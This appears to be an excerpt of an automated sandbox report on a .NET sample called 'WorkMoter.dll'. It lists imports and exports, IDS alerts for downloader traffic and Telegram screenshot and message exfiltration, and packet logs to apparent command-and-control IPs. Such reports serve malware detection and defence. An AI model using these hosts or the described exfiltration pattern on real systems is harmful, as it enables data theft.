api-ms-win-crt-string-l1-1-0.dll | strncat_s, wcsncat_s, strcmp, wcsnlen, wcscat_s, towupper, iswascii, _strdup, strncpy, strnlen, wcstok_s, isdigit, isupper, isalpha, towlower, _wcsdup, iswspace, isspace, islower, strtok_s, _wcsnicmp, strcspn, __strncnt, strlen, wcscpy_s, toupper, wcsncpy_s, strcpy_s, strcat_s, strncpy_s, _strnicmp, tolower, wcsncmp, iswupper, strncmp, _stricmp, _wcsicmp
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsscanf, fflush, __acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vswprintf, __stdio_common_vfwprintf, fputws, fputwc, _get_stream_buffer_pointers, _fseeki64, fread, fsetpos, ungetc, fgetpos, fgets, fgetc, fputc, _wfsopen, _wfopen, __p__commode, _set_fmode, __stdio_common_vsnprintf_s, setvbuf, _setmode, _dup, _fileno, ftell, fseek, fputs, __stdio_common_vsnwprintf_s, __stdio_common_vsprintf_s, fwrite, _flushall, fopen, fclose
api-ms-win-crt-runtime-l1-1-0.dll | _crt_atexit, _cexit, _seh_filter_exe, _set_app_type, _register_onexit_function, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, _initterm, _initterm_e, _exit, _invalid_parameter_noinfo_noreturn, __p___argc, __p___wargv, _c_exit, _register_thread_local_exe_atexit_callback, _initialize_onexit_table, _beginthreadex, terminate, _controlfp_s, _wcserror_s, _invalid_parameter_noinfo, _errno, exit, abort
api-ms-win-crt-convert-l1-1-0.dll | _atoi64, _ltow_s, _wtoi, strtoul, _wcstoui64, atol, _itow_s, strtoull, wcstoul
api-ms-win-crt-heap-l1-1-0.dll | free, _set_new_mode, calloc, malloc, realloc
api-ms-win-crt-utility-l1-1-0.dll | qsort
api-ms-win-crt-math-l1-1-0.dll | asinhf, atanhf, cbrtf, acoshf, cosh, cbrt, coshf, exp, expf, acosh, atanh, floor, floorf, fma, fmaf, cosf, _fdopen, cos, ceilf, _copysignf, _isnanf, trunc, truncf, ilogb, ilogbf, tanhf, ceil, fmod, fmodf, atanf, frexp, atan2f, atan2, log, log10, log10f, atan, asinf, log2, log2f, logf, pow, powf, sin, sinf, asin, sinh, sinhf, sqrt, sqrtf, tan, tanf, tanh, acosf, _copysign, asinh, _isnan, _finite, modf, modff, acos, __setusermatherr
api-ms-win-crt-time-l1-1-0.dll | _time64, _gmtime64_s, wcsftime
api-ms-win-crt-environment-l1-1-0.dll | getenv
api-ms-win-crt-locale-l1-1-0.dll | _unlock_locales, setlocale, __pctype_func, ___lc_locale_name_func, _lock_locales, ___lc_codepage_func, ___mb_cur_max_func, _configthreadlocale, localeconv
api-ms-win-crt-filesystem-l1-1-0.dll | _wrename, _unlock_file, _wremove, _lock_file
Name | Ordinal | Address
CLRJitAttachState | 3 | 0x1407aeff8
DotNetRuntimeInfo | 4 | 0x14079c5d0
MetaDataGetDispenser | 5 | 0x140571170
g_CLREngineMetrics | 2 | 0x14079bde0
g_dacTable | 6 | 0x140644580
Description | Data
Translation | 0x0000 0x04b0
CompanyName | WorkMoter
FileDescription | WorkMoter
FileVersion | 1.0.0.0
InternalName | WorkMoter.dll
LegalCopyright |
OriginalFilename | WorkMoter.dll
ProductName | WorkMoter
ProductVersion | 1.0.0
Assembly Version | 1.0.0.0
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-02-17T19:35:26.525126+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.6 | 49706 | 172.67.19.24 | 443 | TCP
2025-02-17T19:35:40.469309+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49778 | 104.26.12.205 | 80 | TCP
2025-02-17T19:35:40.970979+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49785 | 208.95.112.1 | 80 | TCP
2025-02-17T19:35:42.078768+0100 | 1810009 | Joe Security ANOMALY Telegram Send Photo | 1 | 192.168.2.6 | 49792 | 149.154.167.220 | 443 | TCP
2025-02-17T19:36:07.249077+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49825 | 89.23.97.214 | 80 | TCP
2025-02-17T19:36:07.262561+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49824 | 89.23.97.214 | 80 | TCP
2025-02-17T19:36:28.657629+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49961 | 89.23.97.214 | 80 | TCP
2025-02-17T19:36:28.659655+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49960 | 89.23.97.214 | 80 | TCP
2025-02-17T19:36:50.028855+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49995 | 89.23.97.214 | 80 | TCP
2025-02-17T19:36:50.030883+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49994 | 89.23.97.214 | 80 | TCP
2025-02-17T19:37:11.386733+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49998 | 89.23.97.214 | 80 | TCP
2025-02-17T19:37:11.402768+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49999 | 89.23.97.214 | 80 | TCP
2025-02-17T19:37:12.000976+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 50001 | 149.154.167.220 | 443 | TCP
2025-02-17T19:37:12.044300+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 50002 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 17, 2025 19:35:25.467225075 CET | 49706 | 443 | 192.168.2.6 | 172.67.19.24
Feb 17, 2025 19:35:25.467253923 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:25.470776081 CET | 49706 | 443 | 192.168.2.6 | 172.67.19.24
Feb 17, 2025 19:35:25.485449076 CET | 49706 | 443 | 192.168.2.6 | 172.67.19.24
Feb 17, 2025 19:35:25.485467911 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:25.993844986 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:25.993931055 CET | 49706 | 443 | 192.168.2.6 | 172.67.19.24
Feb 17, 2025 19:35:26.007406950 CET | 49706 | 443 | 192.168.2.6 | 172.67.19.24
Feb 17, 2025 19:35:26.007432938 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:26.007828951 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:26.018058062 CET | 49706 | 443 | 192.168.2.6 | 172.67.19.24
Feb 17, 2025 19:35:26.059350014 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:26.525146008 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:26.525203943 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:26.525243998 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:26.525264025 CET | 49706 | 443 | 192.168.2.6 | 172.67.19.24
Feb 17, 2025 19:35:26.525274038 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:26.525301933 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:26.525322914 CET | 49706 | 443 | 192.168.2.6 | 172.67.19.24
Feb 17, 2025 19:35:26.525438070 CET | 443 | 49706 | 172.67.19.24 | 192.168.2.6
Feb 17, 2025 19:35:26.525485039 CET | 49706 | 443 | 192.168.2.6 | 172.67.19.24
Feb 17, 2025 19:35:26.693206072 CET | 49706 | 443 | 192.168.2.6 | 172.67.19.24
Feb 17, 2025 19:35:39.922727108 CET | 49778 | 80 | 192.168.2.6 | 104.26.12.205
Feb 17, 2025 19:35:39.927525997 CET | 80 | 49778 | 104.26.12.205 | 192.168.2.6
Feb 17, 2025 19:35:39.927598953 CET | 49778 | 80 | 192.168.2.6 | 104.26.12.205
Feb 17, 2025 19:35:39.933170080 CET | 49778 | 80 | 192.168.2.6 | 104.26.12.205
Feb 17, 2025 19:35:39.937935114 CET | 80 | 49778 | 104.26.12.205 | 192.168.2.6
Feb 17, 2025 19:35:40.392990112 CET | 80 | 49778 | 104.26.12.205 | 192.168.2.6
Feb 17, 2025 19:35:40.419847965 CET | 49785 | 80 | 192.168.2.6 | 208.95.112.1
Feb 17, 2025 19:35:40.424674034 CET | 80 | 49785 | 208.95.112.1 | 192.168.2.6
Feb 17, 2025 19:35:40.424813032 CET | 49785 | 80 | 192.168.2.6 | 208.95.112.1
Feb 17, 2025 19:35:40.427426100 CET | 49785 | 80 | 192.168.2.6 | 208.95.112.1
Feb 17, 2025 19:35:40.432238102 CET | 80 | 49785 | 208.95.112.1 | 192.168.2.6
Feb 17, 2025 19:35:40.469309092 CET | 49778 | 80 | 192.168.2.6 | 104.26.12.205
Feb 17, 2025 19:35:40.894540071 CET | 80 | 49785 | 208.95.112.1 | 192.168.2.6
Feb 17, 2025 19:35:40.970978975 CET | 49785 | 80 | 192.168.2.6 | 208.95.112.1
Feb 17, 2025 19:35:41.298034906 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:41.298067093 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:41.298337936 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:41.318811893 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:41.318854094 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:41.942131042 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:41.942212105 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:41.957515001 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:41.957565069 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:41.958223104 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.065037012 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.078275919 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.078557968 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.078820944 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.078875065 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.078902960 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.079122066 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.079227924 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.079468966 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.079540968 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.079648018 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.079695940 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.079942942 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.079987049 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.080482960 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.080503941 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.080775023 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.080799103 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.080857992 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.080883026 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.080887079 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.080909014 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.080916882 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.080934048 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.080976009 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.080992937 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081012011 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081027985 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081051111 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081077099 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081079960 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081115961 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081130981 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081283092 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081305027 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081336975 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081355095 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081382990 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081398964 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081442118 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081460953 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081495047 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081512928 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081532001 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081546068 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081568956 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081583977 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081621885 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081640005 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081672907 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081691980 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081705093 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081828117 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081847906 CET | 443 | 49792 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:35:42.081882954 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081917048 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.081950903 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082099915 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082130909 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082171917 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082217932 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082250118 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082250118 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082272053 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082294941 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082330942 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082353115 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:35:42.082384109 CET | 49792 | 443 | 192.168.2.6 | 149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082421064 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082552910 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082587004 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082607985 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082711935 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.082793951 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.089186907 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.091689110 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.091710091 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:42.091958046 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:42.135337114 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:44.867142916 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:44.867465973 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:44.869961977 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:44.873233080 CET49792443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:35:44.873255968 CET44349792149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:45.866719961 CET4982480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.866723061 CET4982580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.871732950 CET804982589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:45.871768951 CET804982489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:45.871851921 CET4982580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.872101068 CET4982480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.872164965 CET4982580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.872361898 CET4982480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:35:45.880336046 CET804982589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:35:45.881961107 CET804982489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.248764038 CET804982589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.249077082 CET4982580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.250710011 CET4982580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.252804041 CET4996080192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.255525112 CET804982589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.257649899 CET804996089.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.257755041 CET4996080192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.258047104 CET4996080192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.262475967 CET804982489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.262561083 CET4982480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.262789965 CET4982480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.262886047 CET804996089.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.263463974 CET4996180192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.267632008 CET804982489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.268348932 CET804996189.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:07.268426895 CET4996180192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.268609047 CET4996180192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:07.273430109 CET804996189.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.657526016 CET804996189.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.657629013 CET4996180192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.658075094 CET4996180192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.658914089 CET4999480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.659477949 CET804996089.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.659655094 CET4996080192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.659729004 CET4996080192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.660226107 CET4999580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.662884951 CET804996189.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.663794041 CET804999489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.663908958 CET4999480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.664127111 CET4999480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.664501905 CET804996089.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.665154934 CET804999589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.665283918 CET4999580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.665585995 CET4999580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:28.668936968 CET804999489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:28.670463085 CET804999589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.027364969 CET804999589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.028855085 CET4999580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.029215097 CET4999580192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.029949903 CET4999880192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.030814886 CET804999489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.030883074 CET4999480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.030982018 CET4999480192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.031357050 CET4999980192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.033996105 CET804999589.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.034759045 CET804999889.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.034846067 CET4999880192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.035737991 CET804999489.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.036197901 CET804999989.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.036835909 CET4999980192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.036993980 CET4999980192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.037058115 CET4999880192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:36:50.041743040 CET804999989.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:50.041796923 CET804999889.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:54.675223112 CET4977880192.168.2.6104.26.12.205
                                                                                                                                                                                            Feb 17, 2025 19:36:54.680267096 CET8049778104.26.12.205192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:54.680360079 CET4977880192.168.2.6104.26.12.205
                                                                                                                                                                                            Feb 17, 2025 19:36:55.441047907 CET4978580192.168.2.6208.95.112.1
                                                                                                                                                                                            Feb 17, 2025 19:36:55.446345091 CET8049785208.95.112.1192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:36:55.446448088 CET4978580192.168.2.6208.95.112.1
                                                                                                                                                                                            Feb 17, 2025 19:37:11.386657953 CET804999889.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.386733055 CET4999880192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:37:11.387125969 CET4999880192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:37:11.391385078 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.391433001 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.391522884 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.391890049 CET804999889.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.392316103 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.392340899 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.402390957 CET804999989.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.402767897 CET4999980192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:37:11.402769089 CET4999980192.168.2.689.23.97.214
                                                                                                                                                                                            Feb 17, 2025 19:37:11.404488087 CET50002443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.404522896 CET44350002149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.404598951 CET50002443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.405046940 CET50002443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.405065060 CET44350002149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.407568932 CET804999989.23.97.214192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.998653889 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:11.999639988 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:11.999674082 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.000777006 CET50001443192.168.2.6149.154.167.220
                                                                                                                                                                                            Feb 17, 2025 19:37:12.000783920 CET44350001149.154.167.220192.168.2.6
                                                                                                                                                                                            Feb 17, 2025 19:37:12.038059950 CET44350002149.154.167.220192.168.2.6
Feb 17, 2025 19:37:12.043436050 CET | 50002 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:37:12.043461084 CET | 443 | 50002 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:37:12.044178963 CET | 50002 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:37:12.044183969 CET | 443 | 50002 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:37:12.246578932 CET | 443 | 50001 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:37:12.246690989 CET | 443 | 50001 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:37:12.246815920 CET | 50001 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:37:12.247526884 CET | 50001 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:37:12.247550011 CET | 443 | 50001 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:37:12.293179989 CET | 443 | 50002 | 149.154.167.220 | 192.168.2.6
Feb 17, 2025 19:37:12.293328047 CET | 443 | 50002 | 149.154.167.220 | 192.168.2.6
